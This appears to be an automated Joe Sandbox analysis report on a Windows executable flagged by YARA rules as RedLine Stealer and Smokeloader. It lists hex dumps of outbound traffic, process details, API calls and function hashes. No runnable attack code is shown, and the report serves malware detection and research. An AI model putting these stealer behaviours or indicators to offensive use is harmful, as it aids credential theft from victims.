2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: e1 54 dc b5 86 4b 69 19 fc c5 05 75 6a d7 5e 01 50 bf 5f 61 82 a4 33 59 cb 9b 4d 03 42 72 c2 60 46 4d 65 6a ef 4e be 52 93 69 74 fa 5b ec b2 4a e4 e8 40 a8 31 ab b8 22 08 60 b1 67 5e 0b 4d 9a 19 89 2e 7b eb 8e 55 ae e7 21 fa 5f 56 f6 e5 78 db 70 ab 7f 3e d3 e8 6e de c4 fc 6f 89 85 70 54 78 ca 6b 40 0f 3e 1c db 16 f7 9d f3 cc 62 af 51 f8 cd ae f7 1c 92 59 19 9b 93 f8 2f e1 d0 8e dd cc 99 67 33 5e 37 20 4a d9 8e ed 32 fd 29 55 07 9f 84 92 8d de 01 8a 93 bd 1e 1a 48 23 70 d8 93 33 19 21 42 57 b5 db 87 ae f9 df c2 be 3f ef d9 49 88 8f 20 30 f4 ea 90 e4 cb 3d 42 4e 22 7a e5 4d e8 fe 40 21 c6 5e b7 e7 16 4b df 6e 4f 5c 2d b8 9d de de 72 dc 2b 58 21 d5 e6 8c ad 34 76 5e 1a f4 ea 46 1b 5c 3c 8b 24 df aa 45 b4 6e 03 21 c5 7f 00 a5 6c 13 a8 ae 07 41 e6 94 fe 14 05 Data Ascii: TKiuj^P_a3YMBr`FMejNRit[J@1"`g^M.{U!_Vxp>nopTxk@>bQY/g3^7 J2)UH#p3!BW?I 0=BN"zM@!^KnO\-r+X!4v^F\<$En!lA
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: d7 3d 94 c3 89 71 d6 d4 ae 21 75 a6 23 b6 90 a8 37 b4 72 8f c0 fe 67 35 63 7a fc 6a 99 cb 64 32 29 96 6c 2a 92 ee df d0 2b 9f 64 00 c8 26 18 79 c5 29 ce 15 e5 e9 c0 f3 b9 1d 92 a2 87 d4 d1 33 8e fd 05 94 ee 5a de eb 43 46 74 72 20 47 62 f3 f9 de 6e 15 63 55 42 4a 63 a6 b2 33 92 b8 e7 41 94 f0 66 d8 0b 62 77 2d 7f 62 f4 71 07 52 87 34 84 2d 79 e9 71 00 e1 85 5f c2 14 e4 62 60 70 95 8a 90 5c 6d fc f1 e6 26 ff 11 88 ae 3e ce 6c 0d d3 eb aa 38 ce ab 45 01 e1 ad 6b cc 11 30 86 eb 16 04 1d 2b 8f ea 7e 30 46 9b fb 25 84 f1 35 cb b2 b4 82 dd 77 83 40 dd f9 f1 24 0e b4 9d 77 37 6d d0 3d d5 d9 18 dc b9 92 8f e5 30 55 ea 14 75 48 25 43 f7 63 05 d2 51 e8 ec d6 ff f2 c4 9f 68 78 84 fc ff 20 b3 b3 a0 df 1c a5 44 02 46 6c e6 a5 69 21 18 07 2d ec 73 a9 de 97 86 d1 f5 cb Data Ascii: =q!u#7rg5czjd2)l*+d&y)3ZCFtr GbncUBJc3Afbw-bqR4-yq_b`p\m&>l8Ek0+~0F%5w@$w7m=0UuH%CcQhx DFli!-s
2024-04-26 03:44:07 UTC	15331	OUT	Data Raw: 9a 30 f7 82 93 72 5a 35 fa db 4a fe 1e c2 49 f0 98 5d e4 2a 77 13 49 a1 90 99 64 98 22 c8 0b cf 4f c9 77 cb 68 d4 24 82 7c 51 fc ef 2b e2 a7 55 d0 e0 83 d1 13 5f ca de 88 ad 82 dc 11 21 2b 31 f2 6a 80 63 ad ba 52 bb c9 19 36 db 0d a4 e7 5e ad 77 d7 91 eb 6a b3 d5 79 76 c0 b6 9b 40 cd 42 50 e4 e8 67 19 18 8d 2a 99 2e b0 48 ec ef 48 20 65 6d 95 65 4c 65 55 00 6f d5 2b 59 1b 8c fe 3b 78 61 e9 a3 24 a9 0d 41 71 51 40 b0 bc 65 61 6a 4c b0 11 17 b9 32 a4 fb 29 fa 65 83 fb e9 62 6f 28 db dd 47 4b c1 07 a6 7b 12 66 e4 8b 05 a1 7b 43 a4 30 07 cf 3f 6d ad 30 89 87 88 33 5e 0d 84 d1 a5 57 95 d1 7b 08 c6 4d ad e5 48 45 28 ae c9 c1 0d 56 bb eb 62 b8 84 5d 1a 5b 1b 8a 30 ad 0f b0 8e 10 5e 5c 50 89 89 ec 52 c9 0b ab e7 88 96 64 59 9a 63 01 2d 64 b6 c2 4e c2 a2 af fb c8 Data Ascii: 0rZ5JI]wId"Owh$\|Q+U_!+1jcR6^wjyv@BPg.HH emeLeUo+Y;xa$AqQ@eajL2)ebo(GK{f{C0?m03^W{MHE(Vb][0^\PRdYc-dN
2024-04-26 03:44:09 UTC	818	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 03:44:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7rhh2gagc81ks20eel39vogq0d; expires=Mon, 19-Aug-2024 21:30:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3YOLxzWRXE9oIv6quGqw91nIQoZpcGeSB4PiZg7Q%2B8TOdjgxbGhS8GwTwNQe%2BwmQ2DNGQLgV6JncvV%2F9o5CLxL%2FleWTy2%2F6nKPWxPoCNr%2FA4db5Zy17Q59J2imLUY%2B6%2FXghwv6UWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a3928ffa90a570-MIA alt-svc: h3=":443"; ma=86400

Target ID:	0
Start time:	05:43:55
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\VoGtelkHSn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VoGtelkHSn.exe"
Imagebase:	0x400000
File size:	351'232 bytes
MD5 hash:	7F26737F63FCD5B7E2695F438E341075
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:44:08
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 1612
Imagebase:	0x380000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	8.4%
Signature Coverage:	24.3%
Total number of Nodes:	382
Total number of Limit Nodes:	17

Executed Functions

Function 0041D1C1 Relevance: 18.1, APIs: 2, Strings: 8, Instructions: 557
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-^, xrefs: 0041D6B7
onqp, xrefs: 0041D2B8
X&, xrefs: 0041D6BF
onqp, xrefs: 0041D136
onqp, xrefs: 0041D518
AV, xrefs: 0041D6AF
SE, xrefs: 0041D6A7
onqp, xrefs: 0041D142

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID: -^$AV$SE$X&$onqp$onqp$onqp$onqp
API String ID: 0-3369686749
Opcode ID: 2aa403f95998474b279076b6215ed3361f740d88d0d070a12ae0e0386af4dd00
Instruction ID: f2e5acc6d9acbb0f66739c54945ec629fa02afe6258683cb3efe77a6dba95094
Opcode Fuzzy Hash: 2aa403f95998474b279076b6215ed3361f740d88d0d070a12ae0e0386af4dd00
Instruction Fuzzy Hash: 1012AA79608342CBE318CF14D86076BB7E2FFCA314F158A2DE4959B290D778D945CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00423943 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 643
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424618

Strings

+u7, xrefs: 00424AE1
Z8J*, xrefs: 00424A1B

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: ComputerName
String ID: +u7$Z8J*
API String ID: 3545744682-3577212644
Opcode ID: e5e2bda020c127f40aa795968d0effa3993ca4e991fe1260367e154c84f4a601
Instruction ID: 165055785b86ff1ff65636ea23ef9f62a0f191231776936cceeb048ae6667778
Opcode Fuzzy Hash: e5e2bda020c127f40aa795968d0effa3993ca4e991fe1260367e154c84f4a601
Instruction Fuzzy Hash: 10328E70244B528AD729CB34D464BE3BBE1EF57308F484A6DD0FB8B682D778A406CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00424084 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 676
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424618

Strings

P6D/, xrefs: 0042451F

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: ComputerName
String ID: P6D/
API String ID: 3545744682-4117495492
Opcode ID: ec06e984c2a30449314d1b88ce17414e3d69ff200de55d535a507df5e3aeb3c0
Instruction ID: 24e67b7c81de9a4d5bd346c315e300abd70e7ef5a1aa41be01d77cb8b643429b
Opcode Fuzzy Hash: ec06e984c2a30449314d1b88ce17414e3d69ff200de55d535a507df5e3aeb3c0
Instruction Fuzzy Hash: 0F328D70204B928AD726CB34D494BE3BBE1EF57309F48496DD0FB8B282C7796446CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00424087 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 650
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D

Strings

P6D/, xrefs: 0042451F

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: ComputerName
String ID: P6D/
API String ID: 3545744682-4117495492
Opcode ID: 34397599d365594b1f27bb1d2b1b2e758320cc75eb18bdda5297ea087a9b94d1
Instruction ID: 368cbe518a004d91c844a8922d65ddcbde3b63ca03ed0cce2041834018fe7c5f
Opcode Fuzzy Hash: 34397599d365594b1f27bb1d2b1b2e758320cc75eb18bdda5297ea087a9b94d1
Instruction Fuzzy Hash: B9329B70604B528AD726CF34D8A4BE3BBE1EF56308F48496DD0FB8B282C7796446CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00404740 Relevance: 5.5, Strings: 4, Instructions: 501COMMON

Download Yara Rule

Strings

IDAT, xrefs: 00404C05
), xrefs: 004047ED
IEND, xrefs: 00404C7E
IHDR, xrefs: 00404B89

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID: )$IDAT$IEND$IHDR
API String ID: 0-3181356877
Opcode ID: 999feb72cb34461e31fad44a3bfa48fb88dcf5108d16b411e1a0856aea14924b
Instruction ID: 616d1399deee0a63aede7b3c3a380fc91103d69987d9aa92d37846ddb7d7f5fd
Opcode Fuzzy Hash: 999feb72cb34461e31fad44a3bfa48fb88dcf5108d16b411e1a0856aea14924b
Instruction Fuzzy Hash: 6312EFB1A083448FD714CF29DC9076A7BE1EF85304F04857EEA849B392D779D909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00415999 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

x, xrefs: 004159DA

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: ad05adff6cc53639aa453a7d6789a5a507c4f618ea68bd813a2b9754d8c9e1cc
Instruction ID: 5e393febd6900f2cd60b323e8f13313b4837cbc21583559a6409e5a725ef4311
Opcode Fuzzy Hash: ad05adff6cc53639aa453a7d6789a5a507c4f618ea68bd813a2b9754d8c9e1cc
Instruction Fuzzy Hash: D071A1B15087818BD324CF24C49179BFBE1AFD5344F04892EE5D987382D639D949CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02BF817E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02BF81A6
Module32First.KERNEL32(00000000,00000224), ref: 02BF81C6

Memory Dump Source

Source File: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BF7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf7000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d5e1cf431282f4f0da22eaf7a2e224161bf227ed4ed0f1d65aa5a83021806f0e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 2DF062321007106BE7603AF5988CB6BB6E9EF49724F1006A9E742914C0DB70E9894A61

Uniqueness

Uniqueness Score: -1.00%

Function 00414C49 Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

onqp, xrefs: 00414CBE
F, xrefs: 00414D3C, 00415984

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID: onqp$F
API String ID: 0-3477909023
Opcode ID: c3083e97637d1b98026382a83799bf2342d2e2ddf52232be111aac2c52a1a691
Instruction ID: 63a37f33c9773b82383deb7d5d266ebc64ff0dd11a4c80cef5b7f70997e62e81
Opcode Fuzzy Hash: c3083e97637d1b98026382a83799bf2342d2e2ddf52232be111aac2c52a1a691
Instruction Fuzzy Hash: 3121A3B96183418FD72CCF04D5A07BFB7E2AFC6708F54182DE9824B381C77998418B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C540 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

onqp, xrefs: 0041C866

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID: onqp
API String ID: 0-1718216680
Opcode ID: f26432a11f0e7628f2c7279f7c5f6f07fb9995b0172de89e613e759d3e56c9af
Instruction ID: 443a94687d516e7fce39df943a97d10845015d358397bdc9878ab89e8d70c56d
Opcode Fuzzy Hash: f26432a11f0e7628f2c7279f7c5f6f07fb9995b0172de89e613e759d3e56c9af
Instruction Fuzzy Hash: AAA1FFB16443018BD714EF14CCA1BABB3E1FF95724F18491EE49287391E378E991CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00433CC0 Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00438D36,005C003F,00000006,?,?,00000018,82818087,?,ZKA), ref: 00433CED

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
Instruction ID: c1b3d4492825e51a2129b00b8cd86cf652684bda125d9e4c8d1b0ba6372c1005
Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
Instruction Fuzzy Hash: 74E0B675508212EBDA05DF45C14051FF7E2BFC4B14F55C88EE88433204C7B8AD45DB42

Uniqueness

Uniqueness Score: -1.00%

Function 004137C9 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

E&eb, xrefs: 00413787

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID: E&eb
API String ID: 0-175690455
Opcode ID: e98a84fdc1d20ca021328a73e32aeb666d55a0fa0048f113b6151455cacfdda1
Instruction ID: b8f5a8e3dcf807d80dac774d48860337069215117526bb8331fba5c9a38cef06
Opcode Fuzzy Hash: e98a84fdc1d20ca021328a73e32aeb666d55a0fa0048f113b6151455cacfdda1
Instruction Fuzzy Hash: D931B1B1600B018BC725DF75C881AA7B3E2EF89314F18892DD0AAC7791E739F5818744

Uniqueness

Uniqueness Score: -1.00%

Function 004204B7 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46fbeddb66f7a8c04074172de88dd742a5524ad022029cc08458de20aa75746c
Instruction ID: 33964663c1c25b7ce45e863f8a9a155cb930722d678f5f3125d4410b750ac910
Opcode Fuzzy Hash: 46fbeddb66f7a8c04074172de88dd742a5524ad022029cc08458de20aa75746c
Instruction Fuzzy Hash: C0E168B8600B018FD328CF25D994B27B7E5FB49308F84492DE49687B62E778F845CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420CA0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68a2294082866bf6114f45707dfe1b1796c80333bdd16e9bd7e32dcba99880e2
Instruction ID: cfdd1eac7a752c9895d8910292a9cdf1f7f4ab7debb0d412fb0fa544ba69e460
Opcode Fuzzy Hash: 68a2294082866bf6114f45707dfe1b1796c80333bdd16e9bd7e32dcba99880e2
Instruction Fuzzy Hash: E3C1E2B1B083518FD314CF18D89072BB7E1EB95318F65492EF49587392E379D845CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00432010 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816d739d9816e7563fb8951fe6eb3b7e7680ee0badac0fb37556324e6883847d
Instruction ID: 2ad7af327792f261ff722e5f1da2ed22df55520e29869c472b0f36c5ca345de1
Opcode Fuzzy Hash: 816d739d9816e7563fb8951fe6eb3b7e7680ee0badac0fb37556324e6883847d
Instruction Fuzzy Hash: E6A18A74600B018FE728CF25C994B17B7E1FB49304F14896DE5AA8BB91D779F905CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00433D10 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f93c6d70c7d567d40c62c44ae16b965ed5b1ad59c69b285aa2d3c541235419ac
Instruction ID: be2f659581eec67e65d3233d53e9a8afebf0bf0bc19166d434e5d2f0596eea41
Opcode Fuzzy Hash: f93c6d70c7d567d40c62c44ae16b965ed5b1ad59c69b285aa2d3c541235419ac
Instruction Fuzzy Hash: C881BD70A083029BE314CF14C494B2BBBE1FB89759F64991DF4855B392D378DE45CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00422458 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5f4f53ba419257f2c99d53f27223171b991d6193ee5832ef2f56c753d8d8e1
Instruction ID: 4c680af95089d7f0266524c2a1d5a39c2a6c001387b2c56eb0ee7e33708b2ad5
Opcode Fuzzy Hash: 5b5f4f53ba419257f2c99d53f27223171b991d6193ee5832ef2f56c753d8d8e1
Instruction Fuzzy Hash: FB5168742007119BD724CF28C861B62B3F1FF4A318F548A5DE8968B7A1D779B845CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004357CA Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b148af547a59128bb71e64be0d4d12e62a739c123e6228515b622e6ca986d7
Instruction ID: e2717505d55db8640db63e85cfe19b0466bde158ad5ac179620a4d1d884c2fba
Opcode Fuzzy Hash: a8b148af547a59128bb71e64be0d4d12e62a739c123e6228515b622e6ca986d7
Instruction Fuzzy Hash: 124179746083029BE708DF04C594B2FB7E6BFDA718F68591DE0858B341D338ED169B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004359E2 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2911f6e714779df75f77f4e9c30eb5bfbff7d856db354c347998ed89740c5d8
Instruction ID: c1c90ed302c5d13420f5bca68ce5e1754aac3df7c22edd8dd8ca255a1c6ae94c
Opcode Fuzzy Hash: a2911f6e714779df75f77f4e9c30eb5bfbff7d856db354c347998ed89740c5d8
Instruction Fuzzy Hash: 2C216D746083029BE310DF04C994B1FB7F2BBC5B08F245A1DE1949B396C779DC059B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00429597 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71eeffcf46f1b7fa9e56d8600949dbbcd25cfd78c9bd91e554dbcc0743bda1b8
Instruction ID: e757895f7bb26a2b2320ca7d8dd105008f44d0bd9ca2c0e57cc8f66670818d05
Opcode Fuzzy Hash: 71eeffcf46f1b7fa9e56d8600949dbbcd25cfd78c9bd91e554dbcc0743bda1b8
Instruction Fuzzy Hash: 43E0E5B06083018FC314EF28D591B5BBBE0FB89304F12C82DE49A8B254D779A944CB45

Uniqueness

Uniqueness Score: -1.00%

Function 02EB003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02EB024D

Strings

kernel32.dll, xrefs: 02EB008F, 02EB0095
cess, xrefs: 02EB018D

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: c24e50f031e581284867b84552ef9972ccbf3b2bdfaf9f7d465f73cc43b6759a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 1A526974A01229DFDB65CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0041D690 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D77D
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D7A8

Strings

-^, xrefs: 0041D6B7
X&, xrefs: 0041D6BF
AV, xrefs: 0041D6AF
SE, xrefs: 0041D6A7

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: -^$AV$SE$X&
API String ID: 237503144-3017178743
Opcode ID: 126da50c2d0a41b480321852bc94709b34504f4e9e0a0586602205dd78c64019
Instruction ID: 414b802ac07eb15e34250c72f36e95362d79bb1e0692564b293e6573eb188213
Opcode Fuzzy Hash: 126da50c2d0a41b480321852bc94709b34504f4e9e0a0586602205dd78c64019
Instruction Fuzzy Hash: 7A71AAB06083518FE324CF14D8A0BABB7E1EFC6314F114A2DE8E95B280D7789945CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00414950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

